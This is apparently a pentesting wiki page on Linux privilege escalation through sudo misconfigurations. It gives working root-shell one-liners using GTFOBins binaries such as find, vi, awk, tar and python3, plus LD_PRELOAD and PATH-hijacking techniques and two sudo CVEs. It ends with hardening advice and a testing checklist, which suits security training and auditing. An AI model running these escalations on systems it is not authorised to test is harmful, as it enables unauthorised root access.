Sudo Abuse
sudo lets users run commands as another user (usually root) per rules in /etc/sudoers. It’s the legitimate way to delegate privileges, but an over-permissive configuration —a command that can be redirected to a shell, dangerous wildcards, or excessive NOPASSWD— turns sudo into the fastest and most reliable road to root. That’s why sudo -l is always the first thing checked in an escalation.
sudo -l: the starting point
Section titled “sudo -l: the starting point”sudo -l # what commands I can run as root (and whether they need a password)Typical outputs and what they mean:
(root) NOPASSWD: /usr/bin/find # I can run find as root WITHOUT a password(ALL : ALL) ALL # I can do anything = direct root (sudo su)(root) /usr/bin/vi /etc/x # vi as root -> shell from viAbuse the allowed command (GTFOBins)
Section titled “Abuse the allowed command (GTFOBins)”If you can run as root a binary listed in GTFOBins under its sudo section, you have root:
sudo find . -exec /bin/sh \; -quit # findsudo vi -c ':!/bin/sh' # vi/vimsudo less /etc/profile -> !/bin/sh # less (from the pager)sudo awk 'BEGIN {system("/bin/sh")}' # awksudo python3 -c 'import os;os.system("/bin/sh")'sudo env /bin/sh # envsudo tar cf /dev/null x --checkpoint=1 --checkpoint-action=exec=/bin/shGTFOBins has the recipe for dozens of binaries. If sudo -l shows one, look it up there.
Configuration vectors
Section titled “Configuration vectors”LD_PRELOAD / LD_LIBRARY_PATH (env_keep)
Section titled “LD_PRELOAD / LD_LIBRARY_PATH (env_keep)”If sudoers preserves dangerous environment variables (env_keep += LD_PRELOAD):
# compile a library that spawns a shell in its constructor and preload itgcc -shared -fPIC -o /tmp/x.so exploit.csudo LD_PRELOAD=/tmp/x.so <allowed_command> # -> rootWildcards and paths
Section titled “Wildcards and paths”# sudo with a wildcard: sudo /script/* -> you can inject arguments/files# sudo over a script writable by you -> edit the script# sudo over a binary that calls another without an absolute path -> PATH hijackingsecure_path and relative execution
Section titled “secure_path and relative execution”If secure_path isn’t right and the command uses binaries by name, PATH hijacking is possible.
Sudo CVEs
Section titled “Sudo CVEs”Baron Samedit (CVE-2021-3156) heap overflow in sudo -> root needing no special rulesCVE-2019-14287 sudo -u#-1 -> run as root despite "ALL, !root"# check the version: sudo --versionBaron Samedit affected almost all versions for years: if the host is unpatched, it’s direct root regardless of sudoers.
For the defense
Section titled “For the defense”- Least privilege in sudoers: specific commands with absolute paths, never GTFOBins binaries, no dangerous wildcards.
- Avoid NOPASSWD except where essential; don’t preserve
LD_PRELOAD/LD_LIBRARY_PATH(env_reset, notenv_keep). - Don’t grant sudo over writable scripts or binaries that invoke other commands.
- Patch sudo (Baron Samedit, CVE-2019-14287); correct
secure_path. - Logging/auditing of sudo; use
sudoeditinstead of granting full editors.
Testing checklist
Section titled “Testing checklist”-
sudo -l→ which commands and whether NOPASSWD - Cross-reference each allowed command with GTFOBins (sudo section)
- LD_PRELOAD/LD_LIBRARY_PATH if env_keep preserves them
- Wildcards, writable scripts, PATH hijacking
- Sudo version → Baron Samedit (CVE-2021-3156), CVE-2019-14287
- Relative execution / misconfigured secure_path
- Get a root shell and confirm (
id) - Blue: minimal sudoers, patched, env_reset?